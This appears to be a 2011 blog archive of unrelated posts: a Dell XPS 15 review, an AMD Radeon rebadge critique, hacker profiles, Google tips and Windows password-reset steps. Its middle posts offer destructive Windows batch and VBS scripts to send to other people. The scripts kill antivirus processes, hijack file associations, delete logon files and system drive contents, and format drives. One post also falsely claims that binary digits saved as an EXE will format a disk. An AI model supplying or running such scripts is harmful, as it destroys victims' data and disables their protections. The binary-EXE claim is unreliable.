Saturday 23 July 2011

Dell XPS 15 L502x: Tweaking the Formula

Late last year, we finally got a laptop with very few compromises that we could look to as the king of the mainstream market. That laptop was Dell’s XPS 15 L501x; it took a balanced approach to performance, battery life, and portability, with a great display upgrade as a bonus offering. Perhaps more important was you could get all of the important features and still pay less than $1000. It was only natural—nay, inevitable—that Dell would update the XPS line with Sandy Bridge processors, and that’s what we have for review today with the XPS 15 L502x. The graphics have also received a minor update to NVIDIA’s 500M line, though the 400M and 500M are basically fraternal twins.


We won’t spend a lot of time discussing the nuances of the build, as very little has changed relative to the original XPS 15. If you want more information on build quality, the keyboard, etc. we refer you back to our earlier write up. The short summary is that the build quality is still good, but it’s not at the level of something like a Dell Latitude. Dell uses a magnesium alloy frame in the XPS, but the top and bottom are still plastic. Perhaps the bigger issue some will have is with the curves; love it or hate it, the curves are here to stay for the time being. We’ll have a bit more to discuss in a minute, but first let’s start with our usual spec table. The following table lists the available options for the XPS 15, with our review configuration components bolded where applicable.

Dell XPS 15 L502x Specifications
Processor Intel Core i5-2410M (dual-core 2.30-2.90GHz, 35W)
Intel Core i5-2520M (dual-core 2.50-3.20GHz, 35W)
Intel Core i7-2630QM (quad-core 2.00-2.90GHz, 45W)
Intel Core i7-2620M (dual-core 2.70-3.40GHz, 35W)

Intel Core i7-2720QM (quad-core 2.20-3.30GHz, 45W)
Intel Core i7-2820QM (quad-core 2.30-3.40GHz, 45W)
Chipset Intel HM67
Memory 2x2GB DDR3-1333
1x4GB + 1x2GB DDR3-1333
2x4GB DDR-1333 (CL9)
Graphics NVIDIA GeForce GT 525M 1GB DDR3
96 SPs, 600/1200/1800MHz Core/Shader/RAM clocks

NVIDIA GeForce GT 540M 2GB DDR3
96 SPs, 672/1344/1800MHz Core/Shader/RAM clocks
Display 15.6” WLED Glossy 16:9 768p (1366x768)

15.6" B+GR LED Glossy 16:9 1080p (1920x1080)

(AU Optronics B156HW1)
Hard Drive(s) 500GB 7200RPM HDD
640GB 7200RPM HDD

750GB 7200RPM HDD

(Western Digital Scorpio Black WD7500BPKT-75PK4T0)

256GB SSD
Optical Drive 8X Tray-Load DVDRW
Blu-ray Reader/DVDRW Combo (HL-DT-ST CT30N)

Blu-ray Writer/DVDRW
Networking Gigabit Ethernet(Realtek RTL8168/8111)
802.11n WiFi (Intel Wireless-N 1000)
802.11n WiFi (Intel Advanced-N 6150)
802.11n WiFi + Bluetooth 3.0 (Intel Wireless-N 1030)
802.11n WiFi + Bluetooth 3.0
(Intel Advanced-N 6230)
Audio 2.1 JBL Speakers + Waves Audio
(Stereo speakers and subwoofer)
Microphone and two headphone jacks
Capable of 5.1 digital output (HDMI/SPDIF)
Battery 6-cell, 11.1V, ~5.0Ah, 56Wh
9-cell, 11.1V, ~8.1Ah, 90Wh
Front Side Memory Card Reader
Left Side Exhaust vent
1 x USB 3.0
Right Side Optical Drive
2 x Headphone Jack
Microphone Jack
1 x eSATA/USB 2.0 Combo
Back Side Mini DisplayPort
HDMI 1.4
Gigabit Ethernet
TV Input
(Optional)
AC Power Connection
1 x USB 3.0
Kensington Lock
Operating System Windows 7 Home Premium 64-bit
Dimensions 15.0" x 10.4" x 1.3-1.5" (WxDxH, 6-cell)
15.0" x 10.4" x 1.3-2.2" (WxDxH, 9-cell)
Weight 6.33 lbs (6-cell)
6.68 lbs (9-cell)
Extras Waves Maxx Audio 3
2MP Skype HD Certified Webcam (H.264)
86-Key backlit keyboard (Upgrade)
Flash reader (SD/IO/XC/HC, MS/Pro/XC, MMC, xD)
Warranty 1-year standard warranty (depending on variant)
2-, 3-, and 4-year warranties available
Pricing Starting Price: $800
Price as configured: $1425

We received a moderately upgraded version of the L502x this time around. The base model starts at $800 and you can still add the nice 1080p LCD for $150, so you’re still able to get a nice display for under $1000, but outside of Quick Sync the Core i5-2410M isn’t a major upgrade from the older i5-460M and the same can be said of the GT 525M vs. GT 420M. Basically, it’s better, and it’s about the same price, but if you already have the L501x there’s no need to upgrade to dual-core Sandy Bridge. Quad-core Sandy Bridge is a different story, as we’ll see in the benchmarks; Dell shipped the cheapest of the quad-core options, the i7-2630QM.

Along with the CPU upgrade, we’ve got the GT 540M, which is a faster clocked version of the 420M/425M/435M/525M/etc. The old XPS 15 came with a GT 420M by default, which clocks in at 500/1000MHz core/shaders and 1600MHz on the RAM, so the GT 540M has 34% more theoretical computational power and 12.5% more memory bandwidth, plus twice the RAM for good measure. The base model L502x comes with the GT 525M, which is clocked at 600/1200MHz core/shaders, so the 540M is only about 12% faster on the core but has the same memory bandwidth. Depending on the bottleneck, then, the new system should be 10-35% faster than the L501x in games, and potentially more than twice as fast in CPU calculations.

Other upgrades on the test system include 8GB RAM, a 9-cell battery (we still have the smaller 6-cell around as well), and this is the first time we’ve seen a 750GB 7200RPM 2.5” hard drive. Western Digital’s Scorpio Black is king of the 2.5” HDD hill, but unfortunately it’s also a far cry from matching even moderate SSDs. What it lacks in raw performance it makes up for with capacity, and with the increase in areal density the 750GB drive should outperform older 500GB 2.5” drives. Finally, besides the backlit keyboard, Dell also included the 1080p LCD, a TV tuner, and Bluetooth 3.0. The final tally for our test configuration is a much heftier $1425 at the time of writing. Is it worth it? As with so many other things in life, the answer is a nebulous “it depends”. Let’s discuss things a bit more before we get to the benchmarks.

AMD’s Radeon HD 6770 & Radeon HD 6750: The Retail Radeon 5700 Rebadge


We haven’t talked about it beyond a passing comment, but AMD still has some Radeon 6000 series cards that are OEM-only. We are of course referring to the Radeon HD 6770 and Radeon HD 6750, AMD’s Juniper-powered 5770 & 5750 rebadges for OEMs. While we’ve only recently seen the rest of the Northern Islands lineup launch in the retail space, in the OEM space the last-generation Juniper GPU has been filling out AMD’s lineup between Turks (6500/6600) and Barts (6800) based video cards.
The rationale for OEM space is rather straightforward: OEMs want/need something new to sell. More RAM, a Sandy Bridge CPU, a SSD – their 2011 computers need to look better than their 2010 computers, as they certainly don’t want to be seen as selling last year’s model for anything less than a steep discount. It was perhaps a foolish hope that these shenanigans would remain in the OEM market, as so far AMD has continued to keep the 5770 and 5750 even after the rest of Northern Islands has launched. But here we are, out with the old and in with the old: the 5770 and 5750 are getting rebadged in retail. Say hello to the Radeon HD 6770 and Radeon HD 6750.

  AMD Radeon HD 6770 AMD Radeon HD 5770 AMD Radeon HD 6750 AMD Radeon HD 5750
Stream Processors 800 800 720 720
Texture Units 40 40 36 36
ROPs 16 16 16 16
Core Clock 850MHz 850MHz 700MHz 700MHz
Memory Clock 1.2GHz (4.8GHz data rate) GDDR5 1.2GHz (4.8GHz data rate) GDDR5 1.15GHz (4.6GHz data rate) GDDR5 1.15GHz (4.6GHz data rate) GDDR5
Memory Bus Width 128-bit 128-bit 128-bit 128-bit
VRAM 1GB 1GB 1GB 1GB
FP64 N/A N/A N/A N/A
Transistor Count 1.04B 1.04B 1.04B 1.04B
Manufacturing Process TSMC 40nm TSMC 40nm TSMC 40nm TSMC 40nm
Price Point ? ~$110 ? ~$110

There’s really no way to sugarcoat it, and even AMD isn’t really trying. It’s the same Juniper GPU on the same boards with the same clocks, the same power requirements, and the same performance. The only thing different between a 5700 series card and its 6700 series counterpart is the sticker on the card, the BIOS, and quite possibly the price.


Image Courtesy Best Buy




However to be fair to AMD, they have at least made some effort to improve on the 6700 series over the 5700 series through the BIOS. As you may recall, one of the big differences for the 6000 series over the 5000 series is that the 6000 series got HDMI 1.4a support, along with a UVD3 video decoder that was capable of decoding the additional resolutions and bitrates Blu-Ray 3D’s MVC(H.264) profiles require. These changes have been backported to Juniper to some extent.

UVD2.2 is fast enough to process MVC, so now the 6700 series can decode Blu-Ray 3D. Without any hardware on hand we can’t specifically test this, but we suspect AMD may have introduced a new PowerPlay state (or edited an existing one) to further ramp up Juniper’s core clocks when playing MVC content, as this would be the most practical way to increase the max bitrate UVD2.2 can handle, if indeed it couldn’t handle MVC bitrates at the usual core clocks. Update: AMD has confirmed our theory. In fact the UVD3 also have a Blu-Ray 3D PowerPlay state, which means UVD2 and UVD3 may be more similiar than we once thought.

Meanwhile HDMI 1.3 and HDMI 1.4a both have the same bandwidth requirements, so now the 6700 series is HDMI 1.4a capable through some BIOS magic – although we haven’t been able to get confirmation that this support extends beyond support for the frame-packed formats required for HDMI 3D, or in other words it may not support 2K x 4K resolutions and other features normally associated with HDMI 1.4a. Update: AMD confirmed that the 6700 series only supports the HDMI 3D portions of the HDMI 1.4a spec. Apparently this is consistent with Northern Islands, whcih doesn't support 2K x 4K resolutions over HDMI either.


The good news here is that we’re not immediately aware of any reason why these features can’t be fully backported to existing 5700 series cards. Although AMD technically refers to UVD2.2 having “firmware”, as far as we know everything is contained in the video card’s BIOS. If this is the case, then for any 5700 series designs being recycled for the 6700 series, it should be easy to use the 6700 series BIOS. Of course this wouldn’t be something AMD supports.

Ultimately AMD considers this rebadging a necessity to some degree. While everyone is free to speculate on whether there are ulterior motives, what is clear is that the 5700 series created a branding problem for AMD: the 5000 series was launched before ATI was rebranded AMD. So the 5770 and 5750 are still technically “ATI” cards, this being nearly 8 months after ATI was fully rebranded to be part of AMD. At the same time this makes AMD’s product stack consistent from top to bottom for both retail and OEMs: every current card from the 6450 to the 6990 is now a 6000 series cards. It’s not a particularly good reason, but it is what it is.


Ultimately our biggest concern at this point is pricing. AMD tells us that 6700 series pricing will be consistent with 5700 series pricing, but we have our doubts. 5770 has actually been really good – it regularly goes on sale for as low as $95, so if you don’t mind a MIR and the choice of only a couple of vendors, you’ve been able to grab a 5770 for under $100. This is cheaper than the 5750 most of the time, never mind what it does to the 6670 and NVIDIA’s lineup. What is NVIDIA’s lineup? The slightly faster GTX 550 Ti at $125+, and the 5750-like GTS 450 at $90+. Compared to everything AMD and NVIDIA, the 5770 is a very good deal; and this is why we’re concerned about the pricing.

Radeon HD 5700 Series Price History
  Launch Today Difference
Radeon HD 5770 $160 Approx $110 -$50
Radeon HD 5750 $130 Approx $110 -$20

We hope to be proven wrong here, but at this point in time there’s little reason for AMD and their partners to sell $100 5770s when there’s no competitive pressure to do so. A good bargain is another name for a product bringing in less profit than it should, and in the cut-throat semiconductor industry you usually need to grab what you can when you can. The concern we have is that it’s as good a time as any to realign 5770 prices with the competitive market and AMD’s product stack – it’s time for a price hike. There is no doubt in my mind that the first 6700 cards will cost more than the cheapest 5700 cards. The only question is whether prices will come back down once stores are fully stocked with 6700 cards as they are today with 5700 cards.

At the end of the day this rebadging seems to only benefit AMD and their partners, to the detriment of buyers. In a weird twist it’s a bit better than how they handled the 6800 series – at least the 6700 series isn’t slower than the 5700 series – but that’s not saying much. Besides the backported MVC/HDMI 1.4a features, the 6700 series lacks everything else that made the rest of the 6000 series an improvement over the 5000 series. There’s no DisplayPort 1.2, no MPEG-2 or MPEG-4 ASP decoding, no color correction, no improved tessellator, and no linear space color correction. With the exception of perhaps DP1.2 they’re not headlining features, but they’re glaring inconsistencies.

When NVIDIA played the rebadge game with G92 it didn’t help consumers then, and with AMD doing it today, it doesn’t help consumers now. Actually, G92 ultimately got a die shrink from 65nm to 55nm and various clockspeed bumps, so unless AMD makes a 28nm Juniper core this may end up being a worse deal.

It’s perhaps with a twinge of sadness to see this happening to Juniper. Juniper above all other AMD GPUs has been AMD’s workhorse. It was the GPUs game developers first saw in the summer of 2009 when AMD sampled their first DX11 parts, and we’re now coming up on 2 years later where it’s still selling strong. We’re glad to see it live on – it’s a great card and continues to be so at $99, but the rebadging adds a permanent tarnish to the reputation; an air of taking advantage of uninformed buyers that it will never escape. This would seem to be the fate of any GPU fortunate to live long enough to cross multiple generations: if you aren’t replaced, you’re renamed.

April 2011 Video Card MSRPs
NVIDIA Price AMD
$700 Radeon HD 6990
$480  
$320 Radeon HD 6970
  $260 Radeon HD 6950 2GB
$240 Radeon HD 6950 1GB
  $200 Radeon HD 6870
$160 Radeon HD 6850
$150 Radeon HD 6790
$130  
  ? Radeon HD 6770
  $99 Radeon HD 6670
$95-$110  
  $79 Radeon HD 6570
$50-$70 Radeon HD 5570
$55 Radeon HD 6450
$30-$50 Radeon HD 5450

Saturday 16 July 2011

Famous Hackers

Steve Jobs and Steve Wozniak, founders of Apple Computers, are both hackers. Some of their early exploits even resemble the questionable activities of some malicious hackers. However, both Jobs and Wozniak outgrew their malicious behavior and began concentrating on creating computer hardware and software. Their efforts helped usher in the age of the personal computer — before Apple, computer systems remained the property of large corporations, too expensive and cumbersome for average consumers.

Linus Torvalds, creator of Linux, is another famous honest hacker. His open source operating system is very popular with other hackers. He has helped promote the concept of open source software, showing that when you open information up to everyone, you can reap amazing benefits.

Richard Stallman, also known as “rms,” founded the GNU Project, a free operating system. He promotes the concept of free software and computer access. He works with organizations like the Free Software Foundation and opposes policies like Digital Rights Management.

On the other end of the spectrum are the black hats of the hacking world. At the age of 16, Jonathan James became the first juvenile hacker to get sent to prison. He committed computer intrusions on some very high-profile victims, including NASA and a Defense Threat Reduction Agency server. Online, Jonathan used the nickname (called a handle) “c0mrade.” Originally sentenced to house arrest, James was sent to prison when he violated parole.

Greg Finley/Getty Images
Hacker Kevin Mitnick, newly released from the Federal Correctional Institution in Lompoc, California.

Kevin Mitnick gained notoriety in the 1980s as a hacker who allegedly broke into the North American Aerospace Defense Command (NORAD) when he was 17 years old. Mitnick’s reputation seemed to grow with every retelling of his exploits, eventually leading to the rumor that Mitnick had made the FBI’s Most Wanted list. In reality, Mitnick was arrested several times for hacking into secure systems, usually to gain access to powerful computer software.

Kevin Poulsen, or Dark Dante, specialized in hacking phone systems. He’s famous for hacking the phones of a radio station called KIIS-FM. Poulsen’s hack allowed only calls originating from his house to make it through to the station, allowing him to win in various radio contests. Since then, he has turned over a new leaf, and now he’s famous for being a senior editor at Wired magazine.

Adrian Lamo hacked into computer systems using computers at libraries and Internet cafes. He would explore high-profile systems for security flaws, exploit the flaws to hack into the system, and then send a message to the corresponding company, letting them know about the security flaw. Unfortunately for Lamo, he was doing this on his own time rather than as a paid consultant — his activities were illegal. He also snooped around a lot, reading sensitive information and giving himself access to confidential material. He was caught after breaking into the computer system belonging to the New York Times.

It’s likely that there are thousands of hackers active online today, but an accurate count is impossible. Many hackers don’t really know what they are doing — they’re just using dangerous tools they don’t completely understand. Others know what they’re doing so well that they can slip in and out of systems without anyone ever knowing.

PS2,PS3 & PSP Emulators


Here after play ps2 games on pc 

If u don’t have a ps2 or psp console , u can still play those games in ur ordinary pc using emulators  for example u can play ur ps2 games with the psx2 emulator
u can download ps2 emulator here
http://www.softpedia.com/get/Others/Miscellaneous/PCSX2.shtml


ps3 emulator 
http://www.ziddu.com/download/10241660/Ps3EmulatorWorkswithvistawindows7.rar 

psp emulator
http://www.emulator-zone.com/doc.php/psp/jpcsp.html 




35 Funny Computer Viruses (OH NOES)


35 Funny Computer Viruses (OH NOES) Not Useful but funny

1. PAUL REVERE VIRUS: This revolutionary virus does not horse around. It warns you of impending hard disk attack -- once if by LAN, twice if by C:.

2. POLITICALLY CORRECT VIRUS: Never calls itself a "virus," but instead refers to itself as an "electronic microorganism."

3. KATE GOSSELIN VIRUS: Keeps changing its appearance and refuses to go away, even after no one cares whether or not it is still present.

4. MARIO CUOMO VIRUS: It would be a great virus, but it refuses to run.

5. OPRAH WINFREY VIRUS: Your 200MB hard drive suddenly shrinks to 80MB, and then slowly expands back to 200MB. Also tries to take over all media on your computer.

6. AT&T VIRUS: Every three minutes it tells you what great service you are getting.

7. THE VERIZON WIRELESS VIRUS: Every three minutes it reminds you that you're paying too much for the AT&T virus.

8. TED TURNER VIRUS: Colorizes your monochrome monitor.

9. ARNOLD SCHWARZENEGGER VIRUS: Terminates and stays resident. It'll be back.

10. GOVERNMENT ECONOMIST VIRUS: Nothing works, but all your diagnostic software says everything is fine.

11. 2012 VIRUS: Probably harmless, but it makes a lot of people really uncomfortable just thinking about it.

12. FEDERAL BUREAUCRAT VIRUS: Divides your hard disk into hundreds of little units, each of which does practically nothing, but all of which claim to be the most important part of the computer.

13. GALLUP VIRUS: Sixty percent of the PCs infected will lose 38 percent of their data 14 percent of the time (plus or minus a 3.5 percent margin of error).

14. TIGER WOODS VIRUS: Corrupts 121 different files on your hard drive while claiming to be corrupt just one.

15. TEXAS VIRUS: Makes sure that it's bigger than any other file.

16. ADAM AND EVE VIRUS: Takes a couple of bytes out of your Apple.

17. MICHAEL JACKSON VIRUS: Hard to identifiy because it is constantly altering its appearance. This virus won't harm your PC, but your nose may fall off.

18. CONGRESSIONAL VIRUS: The computer locks up, screen splits with a message appearing on each half blaming the other side for the problem.

19. AIRLINE VIRUS: You're in Dallas, but your data is in Singapore.

20. FREUDIAN VIRUS: Your computer becomes obsessed with its own motherboard.

21. PBS VIRUS: Your PC stops every few minutes to ask for money.

22. ELVIS VIRUS: Your computer gets fat, slow, and lazy and then self destructs, only to resurface at shopping malls and service stations across rural America.

23. DR. CONRAD MURRAY VIRUS: Turns your printer into a document shredder.

24. NIKE VIRUS: Just Does It!

25. SEARS VIRUS: Your data won't appear unless you buy new cables, power supply, and a set of shocks.

26. JIMMY HOFFA VIRUS: Nobody can find it.

27. CONGRESSIONAL VIRUS II: Runs every program on the hard drive simultaneously, but doesn't allow the user to accomplish anything.

28. KEVORKIAN VIRUS: Helps your computer shut down whenever it wants to.

29. TILA TEQUILA VIRUS: Is completely irrelevant and no one cares about it. Tries to launch new sites in your browser.

30. STAR TREK VIRUS: Invades your system in places where no virus has gone before.

31. HEALTHCARE VIRUS: Will take your anti-virus software and share it with any other PC's in the neighborhood that lack protection.

32. GEORGE W. BUSH VIRUS: No one knows what this virus does as it is completely unintelligible.

33. CLEVELAND INDIANS VIRUS: Makes your 486/50 machine perform like a 286/AT.

34. LAPD VIRUS: It claims it feels threatened by the other files on your PC and erases them in "self-defense."

35. BALTIMORE ORIOLES VIRUS: Will cause your PC to make frequent mistakes and come in last in the reviews, but you still try to love it anyway.

9 Most dangerous scripts to prank your friend

ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...

1.)Convey your friend a lil' message and shut down his / her computer:
Type :


@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Save it as "Anything.BAT" in All Files and send it.

2.)Toggle your friend's Caps Lock button simultaneously:
Type :


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.


3.)Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

4.)Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :


WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

5.)Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :


MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

6.)Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

7.) Open Notepad continually in your friend's computer:
Type :


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

8.) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :


@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

9.)You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.



Easy way to create Virus-copy paste code

If u want to make some one's pc like this

1.
Ends Process, NAVAPSVC.exe
2.
Ends Process, Explorer.exe (taskbar and icons will dissapear)
3.
Ends Process, zonelabs.exe
4.
associate a exe file with txt (when opening exe files, it will go to notepad)
5.
associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6.
Deletes Login/Logoff Screens

Just Copy
This Below code In Notepad, Save as installhack.bat and you are done!

<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>


title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown


Format A Hard-Disk with Notepad



Format A Hard-Disk with Notepad

Do not try it on Your PC. Dont mess around this is for Educational Purpose Only.


Step 1.
Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect

OR

IF u think u cannot format c drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X -- this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest, its working, still if u cant figure it out try this.....

go to notepad

@Echo off
Del C:\ *.*|y

Save it as Dell.bat

worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

20 Great Google Secrets Must Know!

Syntax Search Tricks:

Using a special
syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at

Code:
www.google.com/help/operators.html


. Here are some advanced operators that
can help narrow down your search results.

Intitle: at the beginning of a
query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:,
searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as

Code:
www.mysite.com/index.html
, you can enter intext:html.


Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in


Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a
number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(Code:
www.google.com/help/features.html#calculator)


lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to
life the universe and everything."

Let Google help you figure out whether you've got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try "thre blund
mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for
business phone listings, try Yellow Search

(Code:
www.buzztoolbox.com/google/yellowsearch.shtml).





Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(Code:
http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE

(Code:
http://froogle.google.com),

which indexes products from online stores, and Google Catalogs
CODE

(Code:
http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at

Code:
www.google.com/options/index.html


You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(Code:
www.googlealert.com)


monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts

(Code:
www.google.com/newsalerts).


This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(Code:
http://labs.google.com),


a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search

(Code:
http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have javascript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from
CODE
Code:
www.google.com/apis



Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.


Online Extra: More Google Tips


Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE
Code:
http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif


), but an easier way is to do a Google daterange: search by filling in a form at

Code:
www.researchbuzz.com/toolbox/goofresh.shtml
or
Code:
www.faganfinder.com/engines/google.shtml
. If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(Code:
www.staggernation.com/gawsh/).


When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(Code:
www.staggernation.com/garbo/).


Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.






Make Pen Drive To Reset Windows 7 Password

Most of us have a PC at home and one at work. We use our work PC most of the times and home PC comparatively less. Did it ever happen to you that you forgot your Windows 7 Password ? Maybe you go for a month long vacations or business trip and when you are back, you may forget some of your passwords to the home Windows 7 PC.

We tend to have lots of passwords at work, online and at various computers. So to save yourself from a locked out situation, we recommend that you create a password reset disk.

In this article, I will share with you a very simple method to create a Windows 7 Password Reset Pen Drive. So next time you are locked out of Windows 7 at the login screen, you can plug in this USB pen drive in your computer and reset the Windows Password.


To create a Windows 7 Password reset pen drive, I advice to have a small capacity pen drive which is cheap and you should keep it at a safe place, but not so safe that you forget where you kept it when you need it sometime in future.


Follow these simple steps:


Step 1. Insert a pen drive (backup any data if present on the pen drive and delete everything). Then go to Windows 7 Start Menu and type “create password reset disk” in the start menu search and launch the program “Create a password reset disk ” which will be highlighted in the search results.


Step 2. Just follow the simple Password reset Wizard as seen below, by selecting the pen drive from a list of drives it will show you. Note: If you have not inserted a Pen Drive before launching the utility, it will not work and will give an error. If the pen drive is in place, you will see Wizard something like the images below. It will also ask for your current password to create a password reset pen drive.


Step 3. Now you simple need to keep this drive at a safe place. You can use this in case you forget your Windows 7 Password sometime in future, just click forgotten password on the login screen and choose the option to Reset Password after inserting this pen drive into any of the working USB ports of your computer.


